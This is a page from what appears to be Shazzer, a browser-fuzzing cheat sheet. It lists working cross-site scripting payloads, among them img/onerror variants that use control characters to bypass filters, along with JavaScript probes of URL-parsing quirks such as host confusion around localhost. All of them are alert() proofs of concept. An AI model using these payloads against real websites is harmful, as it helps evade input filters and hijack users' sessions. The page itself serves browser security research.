Shazzer logo

    Cheat Sheet

    Generated payloads from fuzz test results. Filter by type, category, or browser.

    Found 153 vectors with results

    <img0x09src=x0x09onerror=alert(9)>
    XSSDOM BehaviorChromeFirefox
    <img
src=x
onerror=alert(10)>
    XSSDOM BehaviorChromeFirefox
    <img0x0Csrc=x0x0Conerror=alert(12)>
    XSSDOM BehaviorChromeFirefox
    <img0x0Dsrc=x0x0Donerror=alert(13)>
    XSSDOM BehaviorChromeFirefox
    <img src=x onerror=alert(32)>
    XSSDOM BehaviorChromeFirefox
    <input  id="test" value="s0x00onload="alert(1)" />
    Author: lUcgryy
    XSSHTML ParsingMicrosoft EdgeChrome
    if (['https:'].includes("\https:")){0x0D
    alert(92)0x0D
}
    Author: Simpsonpt
    JSXSS ExecutionFirefox
    <div><img/src/onerror=alert(1)></div>
    Author: lUcgryy
    HTMLHTML ParsingMicrosoft EdgeFirefoxChrome
    <img src=x><img/src/onerror=alert(1)>
    Author: InsertScript
    HTMLHTML ParsingChromeFirefoxSafari
    <img src=0x09x0x09onerror=alert(9)>
    Author: ola456
    XSSDOM BehaviorChromeFirefoxSafari
    <img src=
x
onerror=alert(10)>
    Author: ola456
    XSSDOM BehaviorChromeFirefoxSafari
    <img src=0x0Cx0x0Conerror=alert(12)>
    Author: ola456
    XSSDOM BehaviorChromeFirefoxSafari
    <img src=0x0Dx0x0Donerror=alert(13)>
    Author: ola456
    XSSDOM BehaviorChromeFirefoxSafari
    <img src= x onerror=alert(32)>
    Author: ola456
    XSSDOM BehaviorChromeFirefoxSafari
    <!----!>><img/src/onerror=alert(1)>
    Author: InsertScript
    HTMLHTML ParsingChrome
    if (new URL("https://0x09localhost/endpoint").host == "localhost") {0x0D
    alert(9);0x0D
}
    Author: rootd4ddy
    JSURL HandlingChrome
    if (new URL("https:///localhost/endpoint").host == "localhost") {0x0D
    alert(47);0x0D
}
    Author: rootd4ddy
    JSURL HandlingChrome
    if (new URL("https://@localhost/endpoint").host == "localhost") {0x0D
    alert(64);0x0D
}
    Author: rootd4ddy
    JSURL HandlingChrome
    if (new URL("https://\localhost/endpoint").host == "localhost") {0x0D
    alert(92);0x0D
}
    Author: rootd4ddy
    JSURL HandlingChrome
    if (new URL("https://­localhost/endpoint").host == "localhost") {0x0D
    alert(173);0x0D
}
    Author: rootd4ddy
    JSURL HandlingChrome
    <img src0x09=data:text/plain, id="testImg">
    Author: rootd4ddy
    XSSHTML ParsingChrome
    <img src
=data:text/plain, id="testImg">
    Author: rootd4ddy
    XSSHTML ParsingChrome
    <img src0x0C=data:text/plain, id="testImg">
    Author: rootd4ddy
    XSSHTML ParsingChrome
    <img src0x0D=data:text/plain, id="testImg">
    Author: rootd4ddy
    XSSHTML ParsingChrome
    <img src =data:text/plain, id="testImg">
    Author: rootd4ddy
    XSSHTML ParsingChrome
    <div style="color:red">test</div>
    Author: hipotermia
    HTMLCSS ParsingChromeMicrosoft Edge
    document.body.innerHTML = String.fromCodePoint(60) + "img src=x onerror=alert(60)  />";
    Author: nollium
    JSHTML ParsingChrome
    $:alert(36)
    Author: hackvertor
    JSXSS ExecutionChromeSafari
    _:alert(95)
    Author: hackvertor
    JSXSS ExecutionChromeSafari
    ª:alert(170)
    Author: hackvertor
    JSXSS ExecutionChromeSafari
    µ:alert(181)
    Author: hackvertor
    JSXSS ExecutionChromeSafari
    0 > 0x7f && normalizationForms.forEach(form => {0x0D
    const normalized = String.fromCodePoint(0).normalize(form);0x0D
    for(let charToCheck of charsToCheck) {0x0D
       if(charToCheck === normalized) {0x0D
            alert(String.fromCodePoint(0)+"("+form+")"+"="+charToCheck);0x0D
        }0x0D
     }0x0D
})
    Author: hackvertor
    JSJavaScript SyntaxChromeFirefox
    "1337"09in0x09alert(9)
    Author: hackvertor
    JSXSS ExecutionChromeFirefoxSafari
    "1337"
in
alert(10)
    Author: hackvertor
    JSXSS ExecutionChromeFirefoxSafari
    "1337"0x0Bin0x0Balert(11)
    Author: hackvertor
    JSXSS ExecutionChromeFirefoxSafari
    "1337"0x0Cin0x0Calert(12)
    Author: hackvertor
    JSXSS ExecutionChromeFirefoxSafari
    "1337"0x0Din0x0Dalert(13)
    Author: hackvertor
    JSXSS ExecutionChromeFirefoxSafari
    s = "0";0x0D
if (typeof s["0x00__proto__"] != "undefined") {0x0D
    alert(fromCodePoint(0));0x0D
}
    Author: vitorfhc
    JSBrowser QuirksChrome
    anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(33);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(33)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(36);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(36)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(37);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(37)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(38);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(38)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
let chr = String.fromCodePoint(39);0x0D
anchor.hash = chr;0x0D
if(anchor.hash.slice(1).includes(chr))alert(39)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    <a href="0x01//example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="0x02//example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="0x03//example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="0x04//example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="0x05//example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    try{0x0D
   encodeURIComponent(String.fromCodePoint(55296))0x0D
} catch {0x0D
   alert(55296);0x0D
}
    Author: hackvertor
    JSXSS ExecutionChromeSafariFirefox
    try{0x0D
   encodeURIComponent(String.fromCodePoint(55297))0x0D
} catch {0x0D
   alert(55297);0x0D
}
    Author: hackvertor
    JSXSS ExecutionChromeSafariFirefox
    try{0x0D
   encodeURIComponent(String.fromCodePoint(55298))0x0D
} catch {0x0D
   alert(55298);0x0D
}
    Author: hackvertor
    JSXSS ExecutionChromeSafariFirefox
    try{0x0D
   encodeURIComponent(String.fromCodePoint(55299))0x0D
} catch {0x0D
   alert(55299);0x0D
}
    Author: hackvertor
    JSXSS ExecutionChromeSafariFirefox
    try{0x0D
   encodeURIComponent(String.fromCodePoint(55300))0x0D
} catch {0x0D
   alert(55300);0x0D
}
    Author: hackvertor
    JSXSS ExecutionChromeSafariFirefox
    anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(33);0x0D
if(!/%/.test(anchor+''))alert(33)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(36);0x0D
if(!/%/.test(anchor+''))alert(36)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(38);0x0D
if(!/%/.test(anchor+''))alert(38)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(40);0x0D
if(!/%/.test(anchor+''))alert(40)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
anchor.username = String.fromCodePoint(41);0x0D
if(!/%/.test(anchor+''))alert(41)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='http://example.com';0x0D
anchor.protocol = 'http' + String.fromCodePoint(83) + ':';0x0D
if(!/http:/.test(anchor.protocol+''))alert(83)
    Author: d0ge
    JSURL HandlingSafariFirefoxChrome
    anchor.href='http://example.com';0x0D
anchor.protocol = 'http' + String.fromCodePoint(115) + ':';0x0D
if(!/http:/.test(anchor.protocol+''))alert(115)
    Author: d0ge
    JSURL HandlingSafariFirefoxChrome

    Page 4 of 8

    « PrevNext »

    Distributed Fuzzing

    Enabled:
    Status:disconnected
    Your browser automatically contributes to distributed fuzzing when idle.